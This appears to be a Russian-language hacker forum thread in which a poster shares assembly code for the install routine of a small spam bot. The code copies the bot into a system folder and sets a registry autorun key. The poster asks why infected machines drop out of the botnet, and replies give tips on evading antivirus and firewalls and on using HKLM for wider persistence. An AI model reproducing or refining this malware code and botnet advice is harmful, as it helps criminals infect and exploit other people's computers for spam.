Спам бот в 5,5 килобайт Может ктонить пробовал написать меньше? У мну получилось, но баги в том, что почемуто бот кудато уходит постоянно и после перезагрузки компа не возвращается. код установки бота Code: proc install invoke _SHGetSpecialFolderPath,0,ValueName,0015h,0 invoke _lstrcat,ValueName,my_sys_name mov eax,[fs:18h] ; GetModuleHandle mov eax,[eax+30h] mov eax,[eax+8h] invoke _GetModuleFileName,eax, Value, 256 invoke _CopyFile,Value,ValueName,0 invoke _RegOpenKeyEx,$80000001, n_IKEY, 0, $F003F, key test eax,eax jne _i_exit stdcall _lstrlen,ValueName invoke _RegSetValueEx,[key], my_sys_name+1, 0, 1, ValueName, eax invoke _RegCloseKey,[key] _i_exit: ret endp
т.е. уход сопровождается тем, что со временем бот уходит. - это связано тока с тем что компы уходят в офлайн, но странно почеу обратно не возвращаются т.е. мало возврашаются. А также при отгрузке 1к ботов почемуто на отстук выходит 10-20%. при том что тоже самое наблюдалось и в его предке написанном на Delphi
Ну а что ж ты хотел... Про уходят: это беда всех ботов впринципе. Не всем же жить бесконечно. Аверы не бездействуют. Юзеры тоже могут обнаружить что-то странное. Про отстук: во-первых, обход фаерволов. во-вторых: совместимость с разными виндами. думаю подробнее обяснять не надо )
похоже ты ставишь автозапуск для текущего пользователя (если это код автозапуска тут приведен). То есть если зайти под другим пользователем программа запущена не будет. Также неплохо бы выполнить проверку доступных прав при установке - если есть права админа то писать в Hkey_local_machine. И почему все константы записаны цифрами, это очень неудобно.
